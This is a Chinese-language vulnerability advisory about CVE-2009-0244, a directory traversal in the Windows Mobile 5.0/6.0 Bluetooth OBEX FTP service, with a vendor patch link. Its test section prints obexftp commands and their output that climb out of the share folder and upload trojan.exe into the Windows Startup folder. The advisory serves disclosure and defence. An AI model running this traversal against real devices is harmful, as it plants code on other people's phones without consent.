安全研究

安全漏洞
Microsoft Windows Mobile OBEX FTP服务目录遍历漏洞

发布日期:2009-01-20
更新日期:2009-01-21

受影响系统:
Microsoft Windows Mobile 6.0
Microsoft Windows Mobile 5.0
描述:
BUGTRAQ  ID: 33359
CVE(CAN) ID: CVE-2009-0244

Windows Mobile是微软开发的用于手机等移动设备的操作系统。

大多数Windows Mobile操作系统都捆绑的Microsoft蓝牙栈,OBEX FTP是蓝牙栈中最常见的服务。

可使用OBEX FTP蓝牙服务通过蓝牙共享文件。通常该服务配置为仅共享特定的目录,用户可在该目录放置所有希望共享的文件。默认的目录为My Device\My Documents\Bluetooth Share。

OBEX FTP服务中存在目录遍历漏洞,通过认证的远程攻击者可以使用ObexFTP等工具遍历出默认蓝牙共享目录的父目录,也就是说攻击者可以浏览更低级别的文件夹、下载这些文件夹中的文件或向这些文件夹上传文件。

<*来源:Alberto Moreno Tablado
  
  链接:http://marc.info/?l=bugtraq&m=123247463516881&w=2
        http://marc.info/?l=bugtraq&m=124722943001678&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

* 在下面的示例中攻击者首先列出默认的蓝牙共享文件夹,然后在\Windows\Startup文件夹放置trojan.exe文件。

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "(null)"... <?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder name="" />
  <file name="fotaca.jpg" created="20090119T173932Z" size="134680"/>
  <file name="nota.pwi" created="20090119T175242Z" size="432"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c \
"..\\..\\Windows\\Startup\\" -p trojan.exe Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Sending "..\..\Windows\Inicio\"... done
Sending "trojan.exe"...\done
Disconnecting...done
gospel@gospel-shift:~/bluez$

建议:
厂商补丁:

Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.htc.com/asia/SupportViewNews.aspx?dl_id=609&news_id=195

浏览次数:4406
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障